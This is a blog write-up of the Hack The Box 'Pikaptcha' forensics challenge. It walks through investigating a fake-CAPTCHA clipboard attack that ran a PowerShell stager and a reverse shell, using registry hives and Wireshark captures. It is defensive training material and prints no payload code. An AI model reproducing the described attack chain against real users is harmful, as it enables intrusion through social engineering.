Open in app

Sign in

Write

Sign in

WriteUp > HTB Sherlocks — Pikaptcha

Praj Shete
3 min readNov 20, 2024

Difficulty Level: Medium

Scenario: Happy Grunwald contacted the sysadmin, Alonzo, because of issues he had downloading the latest version of Microsoft Office. He had received an email saying he needed to update, and clicked the link to do it. He reported that he visited the website and solved a captcha, but no office download page came back. Alonzo, who was bombarded with phishing attacks last year and was now aware of attacker tactics, immediately notified the security team to isolate the machine as he suspected an attack. You are provided with network traffic and endpoint artifacts to answer questions about what happened.

Q1. It is crucial to understand any payloads executed on the system for initial access. Analyzing registry hive for user happy grunwald. What is the full command that was run to download and execute the stager.\

To find this we have been given KAPE files which basically contain a C file structure present during the extraction of these files including registry hives. So in these KAPE files, we need to find the registry key that has data stored related to these PowerShell executions, since username is mentioned our go to file will NTUSER.dat registry hive. In that registry hive to look for powershell execution we need to check the RunMRU key which holds the data related to command executions
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

Q2. At what time in UTC did the malicious payload execute?

We can see the Opened On section mentioned in the image above

Q3. The payload which was executed initially downloaded a PowerShell script and executed it in memory. What is sha256 hash of the script?\

From the above script we can see the name of powershell file that has been downloaded from C2 (office2024install.ps1)

Lets get that ps1 file from wireshark and upload it to VT

Q4. To which port did the reverse shell connect?

We can simply analyze this powershell command

Q5. For how many seconds was the reverse shell connection established between C2 and the victim’s workstation?

To find this the wireshark statistics feature can help us

Q6. Attacker hosted a malicious Captcha to lure in users. What is the name of the function which contains the malicious payload to be pasted in victim’s clipboard?

We know the attacker IP and C2 we can filter this in wireshark and see only HTTP packets and follow the HTTP stream

Following this stream we can see the HTML, CSS, JS code used to develop this functionality

Challenge Link: https://app.hackthebox.com/sherlocks/Pikaptcha

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Cybersecurity
Threat Hunting
Malware Analysis
Incident Response
Information Security
Praj Shete
Praj Shete

Written by Praj Shete

17 Followers
1 Following

Passionate Cybersecurity enthusiast, curious about protecting digital assets!

No responses yet

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams